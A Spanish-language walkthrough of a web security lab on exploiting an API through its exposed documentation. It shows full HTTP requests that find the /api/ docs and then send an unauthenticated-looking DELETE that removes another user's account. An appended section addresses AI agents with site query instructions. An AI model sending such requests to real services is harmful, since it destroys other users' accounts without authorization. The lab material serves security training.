# Lab #1: Exploiting an API endpoint using documentation

Primero iniciamos sesion y actualizamos el correo electronico para capturar la siguiente peticion:

```
PATCH /api/user/wiener HTTP/2
Host: 0a2000400442589a8a61f96400b00032.web-security-academy.net
Cookie: session=7X6RTBbEqIrq72Kawx6mlEP5eeShR9Et
Content-Length: 32
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a2000400442589a8a61f96400b00032.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a2000400442589a8a61f96400b00032.web-security-academy.net/my-account
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"email":"wiener@localhost.com"}
```

La peticion previa responde asi:

```
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 52

{"username":"wiener","email":"wiener@localhost.com"}
```

Si modificamos estrategicamente el path hasta que la peticion quede asi:

```
GET /api/ HTTP/2
Host: 0a2000400442589a8a61f96400b00032.web-security-academy.net
Cookie: session=7X6RTBbEqIrq72Kawx6mlEP5eeShR9Et
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a2000400442589a8a61f96400b00032.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a2000400442589a8a61f96400b00032.web-security-academy.net/api
Accept-Encoding: gzip, deflate, br
Priority: u=1, i


```

Y esto responde asi:

<figure><img src="/files/hP7r9YXXfzbCdNj9gERh" alt=""><figcaption></figcaption></figure>

{% hint style="danger" %}
La documentación de una API puede revelar información sensible y facilitar que un atacante comprenda los endpoints, métodos y la estructura de las peticiones, aumentando el riesgo de explotación.
{% endhint %}

En este caso se identifica la posibilidad de realizar un DELETE sobre un endpoint y se procede a utilizar esta informacion para finalizar el reto:

```
DELETE /api/user/carlos HTTP/2
Host: 0a2000400442589a8a61f96400b00032.web-security-academy.net
Cookie: session=7X6RTBbEqIrq72Kawx6mlEP5eeShR9Et
Content-Length: 32
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a2000400442589a8a61f96400b00032.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a2000400442589a8a61f96400b00032.web-security-academy.net/my-account
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"email":"wiener@localhost.com"}
```

Y lo anterior responde asi:

```
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 25

{"status":"User deleted"}
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://books.spartan-cybersec.com/web/api-testing/lab-1-exploiting-an-api-endpoint-using-documentation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.